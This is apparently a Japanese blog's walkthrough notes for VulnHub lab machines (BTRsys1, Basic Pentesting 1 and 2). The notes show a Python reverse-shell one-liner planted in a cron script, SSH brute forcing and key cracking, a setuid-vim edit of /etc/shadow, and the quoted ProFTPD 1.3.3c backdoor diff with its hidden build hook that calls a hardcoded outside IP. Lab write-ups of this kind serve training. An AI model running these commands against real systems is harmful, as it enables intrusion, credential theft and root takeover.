「clearner.py」を書き換えてやればroot取れる。
今回は以下への書き換えを行う。
#! /usr/bin/env python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
「LHOST」と「LPORT」はお好みで。
attacker # python -m SimpleHTTPServer 80
victim www-data@BTRsys1:/var/www/html$ cd /lib/log cd /lib/log www-data@BTRsys1:/lib/log$ cd /tmp cd /tmp www-data@BTRsys1:/tmp$ wget 10.10.10.3/getroot.py wget 10.10.10.3/getroot.py --2020-05-09 20:03:17-- http://10.10.10.3/getroot.py Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 238 [text/plain] Saving to: 'getroot.py' 100%[======================================>] 238 --.-K/s in 0s 2020-05-09 20:03:17 (47.3 MB/s) - 'getroot.py' saved [238/238] www-data@BTRsys1:/tmp$ cp ./getroot.py /lib/log/cleaner.py cp ./getroot.py /lib/log/cleaner.py www-data@BTRsys1:/tmp$
attacker (cron待ち) # nc -nlvp 8080 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::8080 Ncat: Listening on 0.0.0.0:8080 Ncat: Connection from 10.10.10.12. Ncat: Connection from 10.10.10.12:56889. /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root)
「/tmp」下だと、タイミングが悪いとcleaner.pyに 消される可能性があるので「/var/www/html/uploads」で作業する方が良いかもしれない。
学び
- 「find / -perm -2 -type f 2>/dev/null」は偉大では!?
vulnhub Basic Pentesting 2 雑記
Basic pentesting 2
圧縮されたファイルを開くとovaファイルが出てきたが、ovaを読み込むだけでは内部ネットワークにリンクアップしてくれなかった。
この設定環境での話
起動時に「recovery mode」を選択して、「network Enable networking」を選択するとリンクアップした。
電源付けたり消したりする場合は自動設定する必要がある。
サービス調査
# nmap -Pn -p- 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT Nmap scan report for 10.10.10.11 Host is up (0.00011s latency). Not shown: 65529 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 8009/tcp open ajp13 8080/tcp open http-proxy MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 15.64 seconds # nmap -Pn -p22,80,139,445,8009,8080 -sV --version-all 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 21:04 EDT Nmap scan report for 10.10.10.11 Host is up (0.00081s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat 9.0.7 MAC Address: 08:00:27:7F:06:FD (Oracle VirtualBox virtual NIC) Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
気になりどころ
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
- [port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
- [port 8009] ajp13 Apache Jserv (Protocol v1.3)
- [port 8080] http Apache Tomcat 9.0.7
今回は春のApache祭りですか。
詳細
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
いつだかも「Username Enumeration」しかねーじゃんってなった気がする。
ブルートフォースアタックはスマートじゃないので無し。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.11 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.11 + Target Hostname: 10.10.10.11 + Target Port: 80 + Start Time: 2020-05-04 23:48:50 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 9e, size: 56a870fbc8f28, mtime: gzip + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + OSVDB-3268: /development/: Directory indexing found. + OSVDB-3092: /development/: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + 7863 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-04 23:49:15 (GMT-4) (25 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.11 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 4 23:49:46 2020 URL_BASE: http://10.10.10.11/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.11/ ---- ==> DIRECTORY: http://10.10.10.11/development/ + http://10.10.10.11/index.html (CODE:200|SIZE:158) + http://10.10.10.11/server-status (CODE:403|SIZE:299) ---- Entering directory: http://10.10.10.11/development/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Mon May 4 23:49:50 2020 DOWNLOADED: 4612 - FOUND: 2 # dirb http://10.10.10.11/development/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 4 23:50:03 2020 URL_BASE: http://10.10.10.11/development/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.11/development/ ---- ----------------- END_TIME: Mon May 4 23:50:07 2020 DOWNLOADED: 4612 - FOUND: 0
「/development」が怪しい。
# curl http://10.10.10.11 <html> <h1>Undergoing maintenance</h1> <h4>Please check back later</h4> <!-- Check our dev note section if you need to know what to work on. --> </html>
「/development/」に、「dev.txt」と「j.txt」を発見。
# curl http://10.10.10.11/development/dev.txt 2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K 2018-04-22: SMB has been configured. -K 2018-04-21: I got Apache set up. Will put in our content later. -J # curl http://10.10.10.11/development/j.txt For J: I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP. -K
Apache Struts?
「struts」とは「Apache Struts」のこと?
であるならば、「Apache Struts 2.5.12」を使っているということになりそう。
# searchsploit apache (snip) Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution | exploits/linux/remote/42627.py
exploit codeは見つかったけどターゲットが分からんので保留。
+ # -*- coding: utf-8 -*- # pip install requests
K曰くJのパスワードハッシュが脆弱?
/etc/shadowへのディレクトリトラバーサルの示唆を感じたが分からなかった。
[port 139,445] netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# smbclient -L 10.10.10.11 Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- Anonymous Disk IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu) SMB1 disabled -- no workgroup available
このSambaは「Samba Server 4.3.11-Ubuntu」
そういえば、smbclient上手くいったことなかったけど匿名ログインが有効の時しか上手くいかないのでは。
# enum4linux 10.10.10.11 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 5 00:25:23 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.11 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none (snip) ===================================== | OS information on 10.10.10.11 | ===================================== Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 10.10.10.11 from smbclient: [+] Got OS info for 10.10.10.11 from srvinfo: BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu platform_id : 500 os version : 6.1 server type : 0x809a03 (snip) [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\kay (Local User) S-1-22-1-1001 Unix User\jan (Local User) ============================================ | Getting printer info for 10.10.10.11 | ============================================ No printers returned. enum4linux complete on Tue May 5 00:25:38 2020
「kay」と「jan」でログイン試行上手くいかず。
hudraにはユーザがいないと言われた。
exploitはローカルじゃないと上手くいかないぽいので断念。
分からん。
[port 8009] ajp13 Apache Jserv (Protocol v1.3)
こいつ自体はあまり注目せず、Tomcatを確認すべき?
[port 8080] http Apache Tomcat 9.0.7
# nikto -h 10.10.10.11 -p 8080 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.11 + Target Hostname: 10.10.10.11 + Target Port: 8080 + Start Time: 2020-05-05 00:49:02 (GMT-4) --------------------------------------------------------------------------- + Server: No banner retrieved + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. + /examples/servlets/index.html: Apache Tomcat default JSP pages present. + OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. + /manager/html: Default Tomcat Manager / Host Manager interface found + /host-manager/html: Default Tomcat Manager / Host Manager interface found + /manager/status: Default Tomcat Server Status interface found + 8169 requests: 0 error(s) and 12 item(s) reported on remote host + End Time: 2020-05-05 00:49:33 (GMT-4) (31 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.11:8080 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue May 5 00:49:59 2020 URL_BASE: http://10.10.10.11:8080/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.11:8080/ ---- + http://10.10.10.11:8080/docs (CODE:302|SIZE:0) + http://10.10.10.11:8080/examples (CODE:302|SIZE:0) + http://10.10.10.11:8080/favicon.ico (CODE:200|SIZE:21630) + http://10.10.10.11:8080/host-manager (CODE:302|SIZE:0) + http://10.10.10.11:8080/manager (CODE:302|SIZE:0) ----------------- END_TIME: Tue May 5 00:50:03 2020 DOWNLOADED: 4612 - FOUND: 5
とりあえず「/manager/html」にhydraしておく。
(結果長すぎて諦め)
でも、PUTできるってことは本命はそっちなんだろうか。
いや。PUT出来んかった。
よく分からんのでsshに辞書する
janのパスワード弱いって何だったんだ。未だに分からん。
sshやってみるぐらいしかないかなぁ。
# hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.10.11 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. (snip) [22][ssh] host: 10.10.10.11 login: jan password: armando 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-05 06:02:33
え~、パスワードハッシュ弱いってsshの辞書攻撃で良かったんかぁ。
# ssh jan@10.10.10.11 The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established. ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.11' (ECDSA) to the list of known hosts. jan@10.10.10.11's password: (snip) Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102 jan@basic2:~$ id uid=1001(jan) gid=1001(jan) groups=1001(jan) jan@basic2:~$ sudo -l [sudo] password for jan: Sorry, user jan may not run sudo on basic2.
sudo 許されず。
apacheのパスワードファイル見つからんなぁ。
jan@basic2:/home/kay$ ls -al /home/jan/ total 12 drwxr-xr-x 2 root root 4096 Apr 23 2018 . drwxr-xr-x 4 root root 4096 Apr 19 2018 .. -rw------- 1 root jan 47 Apr 23 2018 .lesshst jan@basic2:/home/kay$ ls -al /home/kay/ total 48 drwxr-xr-x 5 kay kay 4096 Apr 23 2018 . drwxr-xr-x 4 root root 4096 Apr 19 2018 .. -rw------- 1 kay kay 756 Apr 23 2018 .bash_history -rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout -rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc drwx------ 2 kay kay 4096 Apr 17 2018 .cache -rw------- 1 root kay 119 Apr 23 2018 .lesshst drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano -rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh -rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful -rw------- 1 root kay 538 Apr 23 2018 .viminfo -rw------- 1 kay kay 57 Apr 23 2018 pass.bak
なんだかkayのディレクトリは充実しているな。
あれ、sshあるってことはログインできるかもしれない。
jan@basic2:/home/kay$ ls -al ./.ssh total 20 drwxr-xr-x 2 kay kay 4096 Apr 23 2018 . drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .. -rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys -rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa -rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
# scp jan@10.10.10.11:/home/kay/.ssh/id_rsa ./sshkey jan@10.10.10.11's password: id_rsa 100% 3326 293.3KB/s 00:00 # ssh -i sshkey kay@10.10.10.11 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for 'sshkey' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "sshkey": bad permissions kay@10.10.10.11's password:
パスワード必要か。
# ls /usr/share/john/ | grep ssh ssh2john.py # /usr/share/john/ssh2john.py sshkey > kayssh # john --wordlist=/usr/share/wordlists/rockyou.txt kayssh Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (sshkey) Warning: Only 1 candidate left, minimum 2 needed for performance. 1g 0:00:00:12 DONE (2020-05-05 07:19) 0.08230g/s 1180Kp/s 1180Kc/s 1180KC/s *7¡Vamos! Session completed
はい、これでいけますね。
# ssh -i sshkey kay@10.10.10.11 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0777 for 'sshkey' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "sshkey": bad permissions kay@10.10.10.11's password:
ローカルに落としたprivatekeyだとログインだめらしいので、janで改めてログインしてからsshログイン。
jan@basic2:/home/kay$ ssh -i ./.ssh/id_rsa kay@10.10.10.11 Could not create directory '/home/jan/.ssh'. The authenticity of host '10.10.10.11 (10.10.10.11)' can't be established. ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts). Enter passphrase for key './.ssh/id_rsa': Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102 kay@basic2:~$ sudo -l [sudo] password for kay: Sorry, try again. [sudo] password for kay: sudo: 1 incorrect password attempt
そういや、kayのパスワード知らんからrootまでいかんね。
kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$
さっきは見えなかったけどこれなんだ。
kay@basic2:~$ cat .bash_history ls -al cat pass.bak cat /dev/null > .bash_history sudo su ls -al cat /dev/null > .bash_history cd /tmp ls -al cd /home/jan ls -al sudo less .viminfo sudo cat /dev/null > .viminfo sudo rm .viminfo less .lesshst sudo less .lesshst cd /home/kay/ ls -al less .bash less .bash_history exit /bin/less /etc/shadow which /bin/less /bin/less /bin/less /etc/passwd sh sudo chmod u-s /bin/less /bin/less ls -al /bin/les ls -al /bin/less sudo chmod u-s /bin/nc.traditional which nc.traditional ls -al /bin/nc* find / -perm -u=s -type f 2>/dev/null which vim sudo chmod u+s /usr/bin/vim ls -al /usr/bin/vim vim /etc/passwd ls -al ls -al /bin/vim vim /etc/shadow vim /etc/passwd cat /etc/passwd vi /etc/passwd cat /etc/passwd ls -al /etc/passwd ifconfig exit
こいつ、/etc/shadowさわれんじゃん。
と思ったが、sudoが必要だったぽい。
いや、でも「sudo chmod u+s /usr/bin/vim」、ここでvimにsetuidしてるぞ。
kay@basic2:~$ openssl passwd -1 pass $1$Yls/Q7aH$lOuA2MSt/Of1BFGaB7NC9. kay@basic2:~$ vim /etc/shadow kay@basic2:~$ sudo su [sudo] password for kay: root@basic2:/home/kay# id uid=0(root) gid=0(root) groups=0(root)
shadowのkayのパスワードを書き換えてしまえ。
:wq!で文句言われるけどsetuidのおかげで反映できちゃうんだよなぁ。
pass.bakの真実
kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$ kay@basic2:~$ sudo su [sudo] password for kay: root@basic2:/home/kay# id uid=0(root) gid=0(root) groups=0(root)
kayのパスワードだった。
おまけ
root@basic2:/home/kay# cd /root root@basic2:~# ls flag.txt root@basic2:~# cat flag.txt Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain a shell, and two ways to privesc. I encourage you to find them all! If you're in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you'll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and therefore might've been overlooked by administrators. Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach out to me. Happy hacking!
終わり
- johnのコマンド登録されていないモジュールが「/usr/share/john」にあった 。
- apacheパスワードからのアプローチがあるんじゃないかと思ったのだが。
vulnhub Basic Pentesting 1 雑記
Basic Pentesting 1
サービス調査
# nmap -p- 10.10.10.10 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:43 EDT Nmap scan report for 10.10.10.10 Host is up (0.00035s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 18.80 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.10 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 01:44 EDT Nmap scan report for 10.10.10.10 Host is up (0.00093s latency). PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:7D:36:49 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.49 seconds
なんか今回早い。
気になりどころ
- [port 21] ftp ProFTPD 1.3.3c
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
詳細
[port 21] ftp ProFTPD 1.3.3c
# searchsploit proftpd ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- (snip) ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | exploits/linux/remote/15662.txt (snip) ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow | exploits/linux/remote/4312.c ProFTPd IAC 1.3.x - Remote Command Execution | exploits/linux/remote/15449.pl (snip)
早速刺さりそうなのを発見。
下二つは刺さらず。
一番刺さりそうなやつの中身を確認
# cat 15662.txt == ProFTPD Compromise Report == On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor. The unauthorized modification of the source code was noticed by Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on Wednesday, December 1 and fixed shortly afterwards. The fact that the server acted as the main FTP site for the ProFTPD project (ftp.proftpd.org) as well as the rsync distribution server (rsync.proftpd.org) for all ProFTPD mirror servers means that anyone who downloaded ProFTPD 1.3.3c from one of the official mirrors from 2010-11-28 to 2010-12-02 will most likely be affected by the problem. The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon. Users are strongly advised to check systems running the affected code for security compromises and compile/run a known good version of the code. To verify the integrity of the source files, use the GPG signatures available on the FTP servers as well on the ProFTPD homepage at: http://www.proftpd.org/md5_pgp.html. The MD5 sums for the source tarballs are: 8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2 4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz = Rootkit patch = diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure --- proftpd-1.3.3c.orig/configure 2010-04-14 00:01:35.000000000 +0200 +++ proftpd-1.3.3c/configure 2010-10-29 19:08:56.000000000 +0200 @@ -9,7 +9,10 @@ ## --------------------- ## ## M4sh Initialization. ## ## --------------------- ## - +gcc tests/tests.c -o tests/tests >/dev/null 2>&1 +cc tests/tests.c -o tests/tests >/dev/null 2>&1 +tests/tests >/dev/null 2>&1 & +rm -rf tests/tests.c tests/tests >/dev/null 2>&1 # Be more Bourne compatible DUALCASE=1; export DUALCASE # for MKS sh if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c --- proftpd-1.3.3c.orig/src/help.c 2009-07-01 01:31:18.000000000 +0200 +++ proftpd-1.3.3c/src/help.c 2010-11-16 18:40:46.000000000 +0100 @@ -27,6 +27,8 @@ */ #include "conf.h" +#include <stdlib.h> +#include <string.h> struct help_rec { const char *cmd; @@ -126,7 +128,7 @@ cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin"); } else { - + if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); } /* List the syntax for the given target command. */ for (i = 0; i < help_list->nelts; i++) { if (strcasecmp(helps[i].cmd, target) == 0) { diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c --- proftpd-1.3.3c.orig/tests/tests.c 1970-01-01 01:00:00.000000000 +0100 +++ proftpd-1.3.3c/tests/tests.c 2010-11-29 09:37:35.000000000 +0100 @@ -0,0 +1,58 @@ +#include <stdio.h> +#include <stdlib.h> +#include <sys/socket.h> +#include <sys/types.h> +#include <netinet/in.h> +#include <arpa/inet.h> +#include <unistd.h> +#include <netdb.h> +#include <signal.h> +#include <string.h> + +#define DEF_PORT 9090 +#define DEF_TIMEOUT 15 +#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n" + +int sock; + +void handle_timeout(int sig) +{ + close(sock); + exit(0); +} + +int main(void) +{ + + struct sockaddr_in addr; + struct hostent *he; + u_short port; + char ip[20]="212.26.42.47"; /* EDB NOTE - HARDCODED IP */ + port = DEF_PORT; + signal(SIGALRM, handle_timeout); + alarm(DEF_TIMEOUT); + he=gethostbyname(ip); + if(he==NULL) return(-1); + addr.sin_addr.s_addr = *(unsigned long*)he->h_addr; + addr.sin_port = htons(port); + addr.sin_family = AF_INET; + memset(addr.sin_zero, 0, 8); + sprintf(ip, inet_ntoa(addr.sin_addr)); + if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1) + { + return EXIT_FAILURE; + } + if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1) + { + close(sock); + return EXIT_FAILURE; + } + if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0)) + { + return EXIT_FAILURE; + } + close(sock); + +return 0; } +
どうやらある時期に配信されていた「ProFTPD」は改ざんされておりbockdoorが仕掛けられているらしい。
Exploits/proftpd-1.3.3c-backdoor - aldeid
このbackdoorを使うのは至って簡単。
# telnet 10.10.10.10 21 Trying 10.10.10.10... Connected to 10.10.10.10. Escape character is '^]'. 220 ProFTPD 1.3.3c Server (vtcsec) [10.10.10.10] HELP ACIDBITCHEZ id; uid=0(root) gid=0(root) groups=0(root),65534(nogroup) python -c "import pty;pty.spawn('/bin/sh')"; # whoami whoami root
あっさり終わった。
Ctrl + ] telnet > q
で終了。
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
# searchsploit openssh ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- (snip) OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py (snip)
userenumerationのみ。
または、限定環境のRCE等。
直接RCEに繋がりそうなものは無い?
とりあえず見つけたuserにhydraすりゃ良いのかなぁ
# cp /usr/share/exploitdb/exploits/linux/remote/40136.py 40136.py # python 40136.py usage: 40136.py [-h] [-u USER | -U USERLIST] [-e] [-s] [--bytes BYTES] [--samples SAMPLES] [--factor FACTOR] [--trials TRIALS] host 40136.py: error: too few arguments # python 40136.py -U /usr/share/wordlists/rockyou.txt -e 10.10.10.10 (snip) [*] Testing your users... [+] password - timing: 0.018958999999999726 [+] princess - timing: 0.413513 [+] 1234567 - timing: 0.019588999999999857 [+] justin - timing: 0.019359000000000126 [+] samantha - timing: 0.01800700000000033 [+] lovers - timing: 0.018003000000000213 [+] dragon - timing: 0.023400999999999783 [+] sweety - timing: 0.020548000000000233 [+] buster - timing: 0.020329999999999515 [+] cheese - timing: 0.020527999999999658 [+] kenneth - timing: 0.0184350000000002 [+] nicholas - timing: 0.021569999999999645 [+] charles - timing: 0.018767999999999674 [+] christine - timing: 0.02230100000000057 [+] scorpio - timing: 0.43433799999999945 [+] ronald - timing: 0.022024000000000044 [+] grace - timing: 0.01963800000000049 [+] 444444 - timing: 0.018848000000000198 [+] rabbit - timing: 0.0182739999999999 [+] loverboy - timing: 0.0191719999999993 (snip) KeyboardInterrupt
userlistにrockyou.txt使って見たけど、以外と沢山いたので途中で止めた。
逆に多すぎて精度が怪しく感じる。
# python 40136.py -u root 10.10.10.10 (snip) [*] Testing your users... [-] root - timing: 0.009611000000000036
沢山いたけど、rootはおらんとな。
とりあえず見つかったユーザでhydraでも回してみる。
終わらないのであきらめ。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.10 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.10 + Target Hostname: 10.10.10.10 + Target Port: 80 + Start Time: 2020-05-04 03:10:13 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: b1, size: 55e1c7758dcdb, mtime: gzip + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/" + 